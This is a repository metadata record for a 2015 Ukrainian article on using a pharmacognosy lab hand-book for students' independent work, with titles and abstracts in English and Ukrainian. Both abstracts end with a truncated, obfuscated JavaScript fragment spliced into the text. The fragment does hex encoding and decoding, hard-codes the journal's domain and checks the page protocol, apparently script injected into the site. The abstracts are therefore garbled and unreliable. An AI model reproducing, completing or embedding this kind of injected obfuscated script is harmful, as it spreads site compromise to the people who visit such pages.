Show simple item record

РОБОЧИЙ ЖУРНАЛ З ФАРМАКОГНОЗІЇ ЯК ОДИН iЗ ВИДІВ САМОСТІЙНОЇ РОБОТИ СТУДЕНТІВ

dc.creatorCholak, I. S.
dc.date2015-12-17
dc.date.accessioned2019-08-26T20:21:03Z
dc.date.available2019-08-26T20:21:03Z
dc.identifierhttps://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5396
dc.identifier10.11603/me.v0i4.5396
dc.identifier.urihttps://repository.tdmu.edu.ua/handle/123456789/11482
dc.descriptionMost scientists consider independent work as an essential component of educational process, which involves the integration of different types of individual and collective educational activities. Independent work using the hand-book is a critical component of the educational process, which is carried out as in the classroom, extracurricular classes, without a teacher, and under his leadership. The main advantages of hand-book are: mastering certain knowledge, skills, consolidation and systematization of theoretical knowledge during training; targeting students for independent critical thinking and search activities; printed basis of working material allows to increase productivity of classwork, to solve more tasks at the same time.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;een-US
dc.descriptionБільшість науковців розглядає самостійну роботу як найважливіший компонент педагогічного процесу, що передбачає інтеграцію різних видів індивідуальної та колективної навчальної діяльності. Самостійна робота з використанням робочого журналу є одним з найважливіших компонентів освітнього процесу, яка здійснюється як під час аудиторних,позааудиторних занять, без участі викладача, так і під його безпосереднім керівництвом. Основними перевагами робочого журналу є засвоєння певних знань, умінь, навичок, закріплення та систематизація теоретичних знань, отриманиху процесі навчання; націлювання студентів на самостійне критичне мислення та пошукову діяльність; друкована основа робочого матеріалу надає можливість підвищити продуктивність заняття, розв’язати більшу кількість завдань за один і той же час.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;euk-UA
dc.formatapplication/pdf
dc.languageukr
dc.publisherTernopil State Medical Universityuk-UA
dc.relationhttps://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5396/4960
dc.rightsАвторське право (c) 2015 Медична освітаuk-UA
dc.sourceMedical Education; No 4 (2015)en-US
dc.sourceМедична освіта; № 4 (2015)uk-UA
dc.source2414-5998
dc.source1681-2751
dc.source10.11603/me.v0i4
dc.titleLABARATORY HAND-BOOK OF PHARMACOGNOSY AS A ONE OF THE STUDENTS INDEPENDENT WORKen-US
dc.titleРОБОЧИЙ ЖУРНАЛ З ФАРМАКОГНОЗІЇ ЯК ОДИН iЗ ВИДІВ САМОСТІЙНОЇ РОБОТИ СТУДЕНТІВuk-UA
dc.typeinfo:eu-repo/semantics/article
dc.typeinfo:eu-repo/semantics/publishedVersion


Files in this item

FilesSizeFormatView

There are no files associated with this item.

This item appears in the following Collection(s)

Show simple item record